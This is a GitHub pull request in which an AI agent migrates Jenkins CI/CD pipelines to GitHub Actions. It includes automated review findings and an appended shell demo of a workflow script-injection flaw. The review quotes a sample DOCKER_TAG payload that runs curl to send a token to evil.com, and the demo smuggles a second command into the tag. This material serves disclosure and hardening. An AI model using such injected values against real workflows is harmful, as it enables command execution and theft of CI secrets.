
Migrate Jenkins CI/CD pipelines to GitHub Actions #97

Open
devin-ai-integration[bot] wants to merge 2 commits into DevOps from devin/1770847490-jenkins-to-github-actions

Conversation


@devin-ai-integration devin-ai-integration Bot commented Feb 11, 2026

Migrate Jenkins CI/CD pipelines to GitHub Actions

Summary

Adds two GitHub Actions workflow files that replicate the existing Jenkins CI and CD pipelines. The original Jenkins files (Jenkinsfile, GitOps/Jenkinsfile, vars/*.groovy) are not modified or removed.

CI workflow (ci.yml) maps the 8-stage Jenkins pipeline:

| Jenkins Stage | GitHub Actions Equivalent |
| --- | --- |
| Workspace cleanup | N/A (fresh runner) |
| Code Checkout (code_checkout()) | actions/checkout@v4 |
| Trivy FS scan (trivy_scan()) | aquasecurity/trivy-action@master |
| OWASP Dependency Check (owasp_dependency()) | dependency-check/Dependency-Check_Action@main |
| SonarQube Analysis (sonarqube_analysis()) | sonarsource/sonarqube-scan-action@v6 |
| SonarQube Quality Gate (sonarqube_code_quality()) | sonarsource/sonarqube-quality-gate-action@master |
| Docker Build (docker_build()) | docker/build-push-action@v5 |
| Docker Push (docker_push()) | Same action with push: true |

CD workflow (cd.yml) maps the GitOps Jenkins pipeline: checkout → update K8s manifest via sed → commit & push → email notification. Chained from CI via workflow_call, also triggerable via workflow_dispatch.

Graceful secret handling

SonarQube and Docker Hub steps are guarded with if: ${{ secrets.SECRET != '' }} conditions so they skip gracefully when the corresponding secrets are not yet configured, rather than failing the entire workflow. This allows the pipeline to run partially (checkout, Trivy, OWASP) even before all secrets are set up.

Required Secrets to Configure

| Secret | Purpose |
| --- | --- |
| DOCKERHUB_USERNAME | Docker Hub username |
| DOCKERHUB_TOKEN | Docker Hub access token |
| SONAR_TOKEN | SonarQube authentication token |
| SONAR_HOST_URL | SonarQube server URL |
| MAIL_SERVER | SMTP server address |
| MAIL_PORT | SMTP server port |
| MAIL_USERNAME | Email sender address |
| MAIL_PASSWORD | Email sender password |
| NOTIFICATION_EMAIL | Email recipient address |

Review & Testing Checklist for Human

  • Docker push on PRs: The build job (which includes Docker image push) runs on pull_request events. This means PR builds will attempt to push images to Docker Hub when secrets are configured. Confirm whether Docker build+push should be gated to push/dispatch events only, or split into separate build-only and push steps.
  • CD push permissions: The CD workflow commits and pushes to kubernetes/bankapp-deployment.yml using GITHUB_TOKEN. Verify that branch protection rules allow github-actions[bot] to push, or consider switching to a PAT / bot-branch + PR pattern.
  • Email notification has no secret guard: The CD email step (dawidd6/action-send-mail@v3) runs with if: always() but has no guard checking if mail secrets are configured. It will error if MAIL_SERVER/MAIL_USERNAME/MAIL_PASSWORD are not set. Decide whether to add an if guard or accept the failure.
  • SonarQube quality gate is non-blocking (continue-on-error: true): This matches the original Jenkins abortPipeline: false behavior. Confirm this is intentional—if you want the gate to block, remove continue-on-error.
  • Hardcoded image path: The sed command in CD uses trainwithshubham/bankapp-eks from the original pipeline. Verify this is the correct image reference for this fork.
  • Test plan: Configure all required secrets above, then trigger CI via workflow_dispatch with a test DOCKER_TAG value. Verify each step executes and the CD workflow updates the K8s manifest correctly.

Notes

  • SonarQube and Docker steps will be skipped (not fail) until their respective secrets are configured
  • Original Jenkins files are preserved and can be removed separately once GitHub Actions is validated

Link to Devin run: https://app.devin.ai/sessions/cf8756bc6d934ddaad02be9952d78c16
Requested by: @angelalincog

Co-Authored-By: Angela  Lin <angela.lin@cognition.ai>
@devin-ai-integration

🤖 Devin AI Engineer

I'll be helping with this pull request! Here's what you should know:

✅ I will automatically:

  • Address comments on this PR. Add '(aside)' to your comment to have me ignore it.
  • Look at CI failures and help fix them

Note: I can only respond to comments from users who have write access to this repository.


…configured

Co-Authored-By: Angela  Lin <angela.lin@cognition.ai>

@devin-ai-integration devin-ai-integration Bot left a comment


Devin Review found 2 potential issues.

View 4 additional findings in Devin Review.


Comment thread .github/workflows/ci.yml

```yaml
        with:
          context: .
          push: true
          tags: ${{ secrets.DOCKERHUB_USERNAME }}/bankapp:${{ steps.set-tag.outputs.docker_tag }}
```

🔴 Docker image name mismatch between CI build and CD deployment

The CI pipeline builds and pushes the Docker image to ${{ secrets.DOCKERHUB_USERNAME }}/bankapp:<tag> (ci.yml:91), but the CD pipeline updates the Kubernetes manifest to reference trainwithshubham/bankapp-eks:<tag> (cd.yml:36). Even if DOCKERHUB_USERNAME is trainwithshubham, the image repository names differ: bankapp vs bankapp-eks. This means the K8s deployment will be updated to reference an image tag that was never pushed to the bankapp-eks repository, causing the deployment to pull a non-existent (or stale) image and likely fail with an ImagePullBackOff error.

Prompt for agents
The CI pipeline pushes the Docker image to the repository named 'bankapp' (ci.yml:91 uses secrets.DOCKERHUB_USERNAME/bankapp:tag), but the CD pipeline's sed command in cd.yml:36 updates the Kubernetes manifest to reference 'trainwithshubham/bankapp-eks:tag'. These are two different Docker image repositories. You need to make the image names consistent. Either change ci.yml line 91 to push to '<username>/bankapp-eks' to match what cd.yml expects, or change cd.yml line 36's sed replacement to use the same '<username>/bankapp' repository that CI pushes to. The Kubernetes deployment manifest (kubernetes/bankapp-deployment.yml:20) currently uses 'trainwithshubham/bankapp-eks:v2', so you would also need to update it if you change the repository name. Also consider using the DOCKERHUB_USERNAME secret in cd.yml instead of the hardcoded 'trainwithshubham' to keep it consistent with ci.yml.

Comment thread .github/workflows/cd.yml
Comment on lines +32 to +36

```yaml
        run: echo "DOCKER TAG RECEIVED - ${{ inputs.DOCKER_TAG }}"

      - name: Update Kubernetes manifest
        run: |
          sed -i -e 's|trainwithshubham/bankapp-eks:.*|trainwithshubham/bankapp-eks:${{ inputs.DOCKER_TAG }}|g' kubernetes/bankapp-deployment.yml
```

🔴 Script injection vulnerability via unsanitized inputs.DOCKER_TAG in shell commands

Multiple run: steps directly interpolate ${{ inputs.DOCKER_TAG }} (and ${{ github.event.inputs.DOCKER_TAG }}) into shell commands. Since workflow_dispatch allows users to supply arbitrary string input for DOCKER_TAG, a malicious value like v1"; curl http://evil.com/steal?t=$(cat $GITHUB_TOKEN); echo " could execute arbitrary commands. This affects ci.yml:31-32, cd.yml:32, cd.yml:36, and cd.yml:47. The safe pattern is to assign the expression to an environment variable first and reference it as $DOCKER_TAG in the shell.

Example of safe pattern

```yaml
env:
  DOCKER_TAG: ${{ inputs.DOCKER_TAG }}
run: |
  echo "DOCKER TAG RECEIVED - $DOCKER_TAG"
```
Prompt for agents
In cd.yml, lines 32, 36, and 47 all directly interpolate ${{ inputs.DOCKER_TAG }} into shell run commands. This is a GitHub Actions script injection vulnerability because the DOCKER_TAG input can contain arbitrary characters when triggered via workflow_dispatch. The fix is to assign the input to an environment variable in each step (using env: DOCKER_TAG: ${{ inputs.DOCKER_TAG }}) and then reference it as $DOCKER_TAG in the shell script. The same issue exists in ci.yml lines 31-32 with ${{ github.event.inputs.DOCKER_TAG }}. All four occurrences across both files need to be fixed.
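The finding above can be reproduced offline. What follows is an added example, not code from the PR or from Devin Review: a POSIX shell script that rebuilds the echo step from cd.yml:32 the way GitHub Actions executes it (expression substituted into the script text, then handed to the shell), alongside a hardened version of the sed step from cd.yml:36 that reads the tag from the DOCKER_TAG environment variable, validates it against Docker's tag grammar, and only then edits the manifest. The manifest content, the marker file that stands in for the review's curl exfiltration, and the function names (vulnerable_echo_tag, valid_docker_tag, safe_update_manifest, manifest_image, demo) are constructed for the demo; IMAGE_REPO uses the trainwithshubham/bankapp-eks reference that the PR's sed command hard-codes.

```shell
#!/bin/sh
# Added example, not code from the PR or from Devin Review. It reproduces the
# DOCKER_TAG injection in the cd.yml echo step and shows a hardened version of
# the cd.yml sed step. The manifest below is constructed for the demo and is
# not the repository's kubernetes/bankapp-deployment.yml.
set -u

# Image reference hard-coded by the PR's cd.yml sed command.
IMAGE_REPO='trainwithshubham/bankapp-eks'

# Write a minimal Deployment pinning the image the CD step rewrites.
make_manifest() {
  cat > "$1" <<'EOF'
apiVersion: apps/v1
kind: Deployment
metadata:
  name: bankapp
spec:
  template:
    spec:
      containers:
        - name: bankapp
          image: trainwithshubham/bankapp-eks:v2
EOF
}

# VULNERABLE (mirrors cd.yml:32). GitHub Actions expands ${{ inputs.DOCKER_TAG }}
# into the script *text* before the shell parses it; building the script as a
# string and handing it to `sh -c` reproduces exactly that.
vulnerable_echo_tag() {
  script="echo \"DOCKER TAG RECEIVED - $1\""
  sh -c "$script"
}

# Docker tag grammar: first char [A-Za-z0-9_], then [A-Za-z0-9_.-], max 128 chars.
# A value outside this grammar can never be a real tag, so refusing it costs nothing.
valid_docker_tag() {
  case $1 in
    ''|*[!A-Za-z0-9_.-]*) return 1 ;;   # empty, or any disallowed byte (newline included)
    [.-]*) return 1 ;;                  # may not start with '.' or '-'
  esac
  [ "${#1}" -le 128 ]
}

# HARDENED version of cd.yml:36. The tag arrives in the DOCKER_TAG environment
# variable (set with `env:` on the step, as the review suggests) and is validated
# before it is interpolated into the sed program. The env-var pattern alone removes
# the shell injection, but $DOCKER_TAG is still expanded inside the sed expression,
# where '|', '&', '\' or a newline would be interpreted by sed, not the shell.
safe_update_manifest() {
  manifest=$1
  tag=${DOCKER_TAG:-}
  if ! valid_docker_tag "$tag"; then
    printf 'refusing DOCKER_TAG: not a valid image tag\n' >&2
    return 1
  fi
  # Write to a temp file and rename: `sed -i` differs between GNU and BSD sed.
  sed -e "s|${IMAGE_REPO}:.*|${IMAGE_REPO}:${tag}|" "$manifest" > "$manifest.tmp" \
    && mv "$manifest.tmp" "$manifest"
}

# The image reference currently in the manifest (used by the checks below).
manifest_image() {
  sed -n 's/^ *image: *//p' "$1"
}

# Demo: run the payload shape from the review through both versions. `touch`
# stands in for the curl exfiltration; the marker file proves execution.
demo() {
  work=$(mktemp -d)
  manifest="$work/bankapp-deployment.yml"
  payload="v1\"; touch $work/marker; echo \""

  make_manifest "$manifest"
  vulnerable_echo_tag "$payload" > /dev/null
  [ -e "$work/marker" ] && echo "vulnerable step: injected command ran (marker created)"

  if DOCKER_TAG=$payload safe_update_manifest "$manifest" 2> /dev/null; then
    echo "hardened step: accepted payload (unexpected)"
  else
    echo "hardened step: payload rejected, manifest still $(manifest_image "$manifest")"
  fi
  DOCKER_TAG=v1.2.3 safe_update_manifest "$manifest"
  echo "hardened step: manifest now $(manifest_image "$manifest")"
  rm -rf "$work"
}

demo
```

Run it with `sh` to see both outcomes. The validation step is the part the review's env-var suggestion does not cover on its own: the shell still expands $DOCKER_TAG into the sed program, so a tag carrying a sed delimiter or metacharacter would change the edit even though no shell command is injected. Docker would reject such a tag anyway, so refusing it before touching the manifest loses nothing, and the same check applies to the ci.yml steps that read github.event.inputs.DOCKER_TAG.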
